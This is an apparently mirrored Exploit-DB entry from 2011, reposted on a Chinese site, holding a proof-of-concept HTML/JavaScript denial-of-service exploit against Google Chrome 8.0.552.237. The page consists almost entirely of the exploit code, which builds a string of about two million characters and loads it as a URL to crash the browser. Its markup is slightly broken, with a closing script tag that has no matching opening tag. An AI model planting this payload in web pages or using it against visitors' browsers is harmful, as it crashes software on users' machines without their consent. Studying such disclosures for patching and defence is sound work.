Google Chrome 8.0.552.237 – address Overflow Denial of Service - 体验盒子

作者： Vuk Ivanovic

日期： 2011-01-18

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/16012/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

<html>

<head>

# Title: Google Chrome v8.0.552.237 address overflow DoS

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Vuk Ivanovic

# Published: 2011-01-17

# Verified: yes

# Google Chrome v8.0.552.237 address overflow DoS

#

# Tested on: Windows XP, SP2 (EN), Windows 7 x64

#

# Date tested: 01/16/2011

#

# Discovered by: Vuk Ivanovic(musashi42)

#

##

function mul3 (str, num) {

if (!num) return "";

var orig = str,

soFar = [str],

added = 1,

left, i;

while (added < num) {

left = num - added;

str = orig;

for (i = 2; i < left; i *= 2) {

str += str;

}

soFar.push(str);

added += (i / 2);

}

return soFar.join("");

}

var junka = "a";

var junk = mul3(junka,2097033);

window.location.href = "http://" + junk;

</script>

</head>

<body>

</body>

</html>